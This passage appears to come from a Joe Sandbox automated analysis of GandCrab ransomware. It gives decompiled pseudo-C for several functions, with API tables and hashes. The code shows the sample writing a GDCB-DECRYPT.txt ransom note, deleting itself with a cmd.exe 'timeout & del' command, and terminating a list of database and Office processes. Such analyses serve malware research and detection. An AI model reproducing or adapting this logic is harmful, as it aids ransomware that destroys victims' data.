					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}























                                        0x0f9d7140
                                        0x0f9d7148
                                        0x0f9d714a
                                        0x0f9d714e
                                        0x0f9d7153
                                        0x0f9d7161
                                        0x0f9d7164
                                        0x0f9d7169
                                        0x0f9d7169
                                        0x0f9d716f
                                        0x0f9d7179
                                        0x0f9d7180
                                        0x0f9d7184
                                        0x0f9d7187
                                        0x0f9d7187
                                        0x0f9d718d
                                        0x0f9d719b
                                        0x0f9d719d
                                        0x0f9d71a5
                                        0x0f9d71a8
                                        0x0f9d71a8
                                        0x0f9d71ae
                                        0x0f9d71bc
                                        0x0f9d71be
                                        0x0f9d71c6
                                        0x0f9d71c9
                                        0x0f9d71c9
                                        0x0f9d71cf
                                        0x0f9d71dd
                                        0x0f9d71df
                                        0x0f9d71e7
                                        0x0f9d71ea
                                        0x0f9d71ea
                                        0x0f9d71f0
                                        0x0f9d71fe
                                        0x0f9d7200
                                        0x0f9d7208
                                        0x0f9d720b
                                        0x0f9d720b
                                        0x0f9d7211
                                        0x0f9d721f
                                        0x0f9d7221
                                        0x0f9d7229
                                        0x0f9d722c
                                        0x0f9d722c
                                        0x0f9d7232
                                        0x0f9d7240
                                        0x0f9d7242
                                        0x0f9d724a
                                        0x0f9d724d
                                        0x0f9d724d
                                        0x0f9d7253
                                        0x0f9d7255
                                        0x0f9d7255
                                        0x0f9d725c
                                        0x0f9d726a
                                        0x0f9d726c
                                        0x0f9d7274
                                        0x0f9d7277
                                        0x0f9d7277
                                        0x0f9d7280
                                        0x0f9d72ac
                                        0x0f9d7282
                                        0x0f9d7288
                                        0x0f9d72a6
                                        0x0f9d72a6

                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7192
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D719D
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71B3
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71BE
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71D4
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71DF
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71F5
                                        • lstrlenW.KERNEL32(0F9D4966,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7200
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7216
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7221
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7237
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7242
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7261
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D726C
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7288
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7296
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID:
                                        • API String ID: 1659193697-0
                                        • Opcode ID: 6a88eac016091fd40f4fac5fda2f6562c290ef44477970f82424d7ea23117100
                                        • Instruction ID: 9d68a9b8f781679658be0a54c2da7e352ce35ebdcfacee7124517a2674326a03
                                        • Opcode Fuzzy Hash: 6a88eac016091fd40f4fac5fda2f6562c290ef44477970f82424d7ea23117100
                                        • Instruction Fuzzy Hash: 04413032101652EFD7125FB8DE8C794BBA1FF04326F188534E51682A62D775B8B8DF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D53A0 Relevance: 18.1, APIs: 12, Instructions: 92filestringmemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D53A0(WCHAR* __ecx) {
				CHAR* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _t22;
				void* _t24;
				signed int _t26;
				int _t30;
				char _t32;
				void* _t33;
				signed char _t34;
				CHAR* _t36;
				WCHAR* _t37;
				WCHAR* _t38;
				void* _t39;
				CHAR* _t40;

				_t37 = __ecx;
				_t39 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
				_v20 = _t39;
				GetModuleFileNameW(0, _t39, 0x200);
				_t33 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0x80, 0);
				_v16 = _t33;
				if(_t33 != 0xffffffff) {
					_t22 = CreateFileMappingW(_t33, 0, 8, 0, 0, 0);
					_v24 = _t22;
					if(_t22 != 0) {
						_t24 = MapViewOfFile(_t22, 1, 0, 0, 0);
						_v12 = _t24;
						if(_t24 != 0) {
							_t5 = _t24 + 0x4e; // 0x4e
							_t40 = _t5;
							_v8 = _t40;
							_t26 = lstrlenW(_t37);
							_t34 = 0;
							_t38 =  &(_t37[_t26]);
							if(lstrlenA(_t40) + _t27 != 0) {
								_t36 = _t40;
								do {
									if((_t34 & 0x00000001) != 0) {
										 *((char*)(_t38 + _t34)) = 0;
									} else {
										_t32 =  *_t40;
										_t40 =  &(_t40[1]);
										 *((char*)(_t38 + _t34)) = _t32;
									}
									_t34 = _t34 + 1;
									_t30 = lstrlenA(_t36);
									_t36 = _v8;
								} while (_t34 < _t30 + _t30);
							}
							UnmapViewOfFile(_v12);
							_t33 = _v16;
							_t39 = _v20;
						}
						CloseHandle(_v24);
					}
					CloseHandle(_t33);
				}
				return VirtualFree(_t39, 0, 0x8000);
			}




















                                        0x0f9d53b7
                                        0x0f9d53bf
                                        0x0f9d53c9
                                        0x0f9d53cc
                                        0x0f9d53eb
                                        0x0f9d53ed
                                        0x0f9d53f3
                                        0x0f9d5404
                                        0x0f9d540a
                                        0x0f9d540f
                                        0x0f9d541a
                                        0x0f9d5420
                                        0x0f9d5425
                                        0x0f9d5427
                                        0x0f9d5427
                                        0x0f9d542b
                                        0x0f9d542e
                                        0x0f9d5435
                                        0x0f9d5437
                                        0x0f9d5442
                                        0x0f9d5444
                                        0x0f9d5446
                                        0x0f9d5449
                                        0x0f9d5453
                                        0x0f9d544b
                                        0x0f9d544b
                                        0x0f9d544d
                                        0x0f9d544e
                                        0x0f9d544e
                                        0x0f9d5458
                                        0x0f9d5459
                                        0x0f9d545f
                                        0x0f9d5464
                                        0x0f9d5446
                                        0x0f9d546b
                                        0x0f9d5471
                                        0x0f9d5474
                                        0x0f9d5474
                                        0x0f9d547a
                                        0x0f9d547a
                                        0x0f9d5481
                                        0x0f9d5481
                                        0x0f9d549b

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000404,00003000,00000040,00000000,74CF81D0,00000000,?,?,?,?,0F9D55B2), ref: 0F9D53B9
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0F9D55B2), ref: 0F9D53CC
                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,0F9D55B2), ref: 0F9D53E5
                                        • CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,?,?,?,0F9D55B2), ref: 0F9D5404
                                        • MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,0F9D55B2), ref: 0F9D541A
                                        • lstrlenW.KERNEL32(?,?,?,?,?,0F9D55B2), ref: 0F9D542E
                                        • lstrlenA.KERNEL32(0000004E,?,?,?,?,0F9D55B2), ref: 0F9D543A
                                        • lstrlenA.KERNEL32(0000004E,?,?,?,?,0F9D55B2), ref: 0F9D5459
                                        • UnmapViewOfFile.KERNEL32(?,?,?,?,?,0F9D55B2), ref: 0F9D546B
                                        • CloseHandle.KERNEL32(?,?,?,?,?,0F9D55B2), ref: 0F9D547A
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0F9D55B2), ref: 0F9D5481
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0F9D55B2), ref: 0F9D548F
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$lstrlen$CloseCreateHandleViewVirtual$AllocFreeMappingModuleNameUnmap
                                        • String ID:
                                        • API String ID: 869890170-0
                                        • Opcode ID: 91f8594f7e53ff3347cc5327525c73afad142cb364c1f65c698b8143711735c8
                                        • Instruction ID: 0a4ec33140be44d973fc6aebe2ad37e932ed4cd16b21a66ecc3e5b17ab2045a9
                                        • Opcode Fuzzy Hash: 91f8594f7e53ff3347cc5327525c73afad142cb364c1f65c698b8143711735c8
                                        • Instruction Fuzzy Hash: 2B31F670645315BBF7304FA49C4AF9D7B6CAF05B12F348014F701BA1C2CAB8A5608B69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6BE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59filememorystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D6BE0(void* __ecx) {
				long _v8;
				WCHAR* _t7;
				signed int _t16;
				void* _t21;
				void* _t22;
				void* _t25;

				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
				wsprintfW(_t25, L"%s\\GDCB-DECRYPT.txt", _t21);
				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t7 =  *0xf9e2a64; // 0x1f2000
					if(_t7 != 0) {
						WriteFile(_t22,  *0xf9e2a64, lstrlenW(_t7) + _t11,  &_v8, 0);
					}
					CloseHandle(_t22);
					_t16 = 1;
				} else {
					_t16 = 0 | GetLastError() == 0x000000b7;
				}
				VirtualFree(_t25, 0, 0x8000);
				return _t16;
			}









                                        0x0f9d6bfb
                                        0x0f9d6c03
                                        0x0f9d6c25
                                        0x0f9d6c2a
                                        0x0f9d6c3e
                                        0x0f9d6c45
                                        0x0f9d6c5e
                                        0x0f9d6c5e
                                        0x0f9d6c65
                                        0x0f9d6c6b
                                        0x0f9d6c2c
                                        0x0f9d6c39
                                        0x0f9d6c39
                                        0x0f9d6c78
                                        0x0f9d6c86

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F9D6CC2,00000000,?,?), ref: 0F9D6BF5
                                        • wsprintfW.USER32 ref: 0F9D6C03
                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F9D6C1F
                                        • GetLastError.KERNEL32(?,?), ref: 0F9D6C2C
                                        • lstrlenW.KERNEL32(001F2000,?,00000000,?,?), ref: 0F9D6C4E
                                        • WriteFile.KERNEL32(00000000,00000000,?,?), ref: 0F9D6C5E
                                        • CloseHandle.KERNEL32(00000000,?,?), ref: 0F9D6C65
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F9D6C78
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
                                        • String ID: %s\GDCB-DECRYPT.txt
                                        • API String ID: 2985722263-4054134092
                                        • Opcode ID: 61ecc08a0d74ff2eb05ea93f08ce3620796b9f9efbc6721815f43839a10bb89a
                                        • Instruction ID: 528289e7129729d578782d09b17d4617148ebba06c88b738be64b4aae6f39272
                                        • Opcode Fuzzy Hash: 61ecc08a0d74ff2eb05ea93f08ce3620796b9f9efbc6721815f43839a10bb89a
                                        • Instruction Fuzzy Hash: DB01B5753493107BF2301B74ED4BF6A3A6CDB46B66F304114FB05E91C2DBA869708669
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D5190 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D5190() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}





                                        0x0f9d51b6
                                        0x0f9d51ba
                                        0x0f9d51be
                                        0x0f9d51c8
                                        0x0f9d51d0
                                        0x0f9d51d9
                                        0x0f9d51f3
                                        0x0f9d51f3
                                        0x0f9d51d0
                                        0x0f9d51fb

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0F9D5392,00000000), ref: 0F9D51A6
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F9D51B8
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 0F9D51C8
                                        • wsprintfW.USER32 ref: 0F9D51D9
                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0F9D51F3
                                        • ExitProcess.KERNEL32 ref: 0F9D51FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
                                        • String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
                                        • API String ID: 4033023619-516011104
                                        • Opcode ID: 88e0d11951383276035ca72d3f631ed8fe3de7c76dbd2aee08c05eca70f6a8ca
                                        • Instruction ID: 223ed9f4fdf2b1c67bcc8898d83174796d0f3b6891c94885c78c505186383b75
                                        • Opcode Fuzzy Hash: 88e0d11951383276035ca72d3f631ed8fe3de7c76dbd2aee08c05eca70f6a8ca
                                        • Instruction Fuzzy Hash: 35F030327C632177F13116655C0FF072D2C9B85F2AF398004F709BE1C389E8656086A9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D46F0 Relevance: 15.1, APIs: 10, Instructions: 114processmemorystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 98%
                                        			E0F9D46F0() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				int _t51;
				int _t52;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t70 = CreateToolhelp32Snapshot(2, 0);
				_v172 = _t70;
				_t60 = VirtualAlloc(0, 0x22c, 0x3000, 4);
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70);
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000);
				}
				return CloseHandle(_t72);
			}





















































                                        0x0f9d46f6
                                        0x0f9d4703
                                        0x0f9d470b
                                        0x0f9d4713
                                        0x0f9d471b
                                        0x0f9d4723
                                        0x0f9d472b
                                        0x0f9d4733
                                        0x0f9d473b
                                        0x0f9d4743
                                        0x0f9d474b
                                        0x0f9d4753
                                        0x0f9d475b
                                        0x0f9d4763
                                        0x0f9d476b
                                        0x0f9d4773
                                        0x0f9d477b
                                        0x0f9d4783
                                        0x0f9d478b
                                        0x0f9d4793
                                        0x0f9d479b
                                        0x0f9d47a3
                                        0x0f9d47ab
                                        0x0f9d47b3
                                        0x0f9d47bb
                                        0x0f9d47c3
                                        0x0f9d47cb
                                        0x0f9d47d3
                                        0x0f9d47de
                                        0x0f9d47e9
                                        0x0f9d47f4
                                        0x0f9d47ff
                                        0x0f9d480a
                                        0x0f9d4815
                                        0x0f9d4820
                                        0x0f9d482b
                                        0x0f9d4836
                                        0x0f9d4841
                                        0x0f9d484c
                                        0x0f9d4857
                                        0x0f9d4874
                                        0x0f9d4878
                                        0x0f9d4882
                                        0x0f9d4886
                                        0x0f9d4888
                                        0x0f9d4891
                                        0x0f9d4893
                                        0x0f9d4895
                                        0x0f9d4895
                                        0x0f9d4891
                                        0x0f9d48a1
                                        0x0f9d48a1
                                        0x0f9d48a4
                                        0x0f9d48a4
                                        0x0f9d48b0
                                        0x0f9d48b5
                                        0x0f9d48bd
                                        0x0f9d48cb
                                        0x0f9d48cf
                                        0x0f9d48d4
                                        0x0f9d48e1
                                        0x0f9d48e1
                                        0x0f9d48cf
                                        0x0f9d48eb
                                        0x0f9d48ec
                                        0x0f9d48ec
                                        0x0f9d48ef
                                        0x0f9d48f4
                                        0x0f9d48fa
                                        0x0f9d4900
                                        0x0f9d4900
                                        0x0f9d4903
                                        0x0f9d4909
                                        0x0f9d4913
                                        0x0f9d4913
                                        0x0f9d4922

                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0F9D4862
                                        • VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 0F9D487C
                                        • Process32FirstW.KERNEL32(00000000,00000000), ref: 0F9D4895
                                        • lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F9D48B5
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F9D48C5
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0F9D48D4
                                        • CloseHandle.KERNEL32(00000000), ref: 0F9D48E1
                                        • Process32NextW.KERNEL32(?,00000000), ref: 0F9D48FA
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D4913
                                        • CloseHandle.KERNEL32(?), ref: 0F9D491A
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32Virtual$AllocCreateFirstFreeNextOpenSnapshotTerminateToolhelp32lstrcmpi
                                        • String ID:
                                        • API String ID: 3586910739-0
                                        • Opcode ID: 0a5af32f8358616a82d5ff002e8cd54016a2d25783bc7eea241d44a294886b9a
                                        • Instruction ID: 622c47e7eb27b7a4fbf34b5b108a8eb5cf91bffc6efc84e014208d04cd5bcbec
                                        • Opcode Fuzzy Hash: 0a5af32f8358616a82d5ff002e8cd54016a2d25783bc7eea241d44a294886b9a
                                        • Instruction Fuzzy Hash: FC5158B41093849FD7208F14984A75ABBE8BB8271CF70C91CF59A5B2D2C7788919CF96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D2C50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62stringthreadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E0F9D2C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0xf9df290; // 0x21
				asm("movdqu xmm0, [0xf9df280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E0F9D2AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}










                                        0x0f9d2c59
                                        0x0f9d2c5e
                                        0x0f9d2c66
                                        0x0f9d2c69
                                        0x0f9d2c70
                                        0x0f9d2c76
                                        0x0f9d2c79
                                        0x0f9d2ce9
                                        0x0f9d2cf2
                                        0x0f9d2d01
                                        0x0f9d2c7b
                                        0x0f9d2c7e
                                        0x0f9d2c9f
                                        0x0f9d2cbd
                                        0x0f9d2ccb
                                        0x0f9d2cd7
                                        0x0f9d2c80
                                        0x0f9d2c94
                                        0x0f9d2c94
                                        0x0f9d2c7e

                                        APIs
                                        • DefWindowProcW.USER32(?,?,?,?), ref: 0F9D2C8A
                                        • BeginPaint.USER32(?,?), ref: 0F9D2C9F
                                        • lstrlenW.KERNEL32(?), ref: 0F9D2CAC
                                        • TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0F9D2CBD
                                        • EndPaint.USER32(?,?), ref: 0F9D2CCB
                                        • CreateThread.KERNEL32 ref: 0F9D2CE9
                                        • DestroyWindow.USER32(?), ref: 0F9D2CF2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
                                        • String ID: GandCrab!
                                        • API String ID: 572880375-2223329875
                                        • Opcode ID: 37131f888b245359eec163c406be56ffa05b4ec09fdb5c0783ae18a439822bf6
                                        • Instruction ID: 5335b077f8efd42d98b3f5f631aed1602a0c00fb5ca3b4ea69f0767a9b87d3e7
                                        • Opcode Fuzzy Hash: 37131f888b245359eec163c406be56ffa05b4ec09fdb5c0783ae18a439822bf6
                                        • Instruction Fuzzy Hash: 5B11C832109309AFE721DF64DC0AFAA7B6CFB49322F104616FE41D6191E7719970CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D3E20 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136memorythreadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E0F9D3E20(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				void* _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
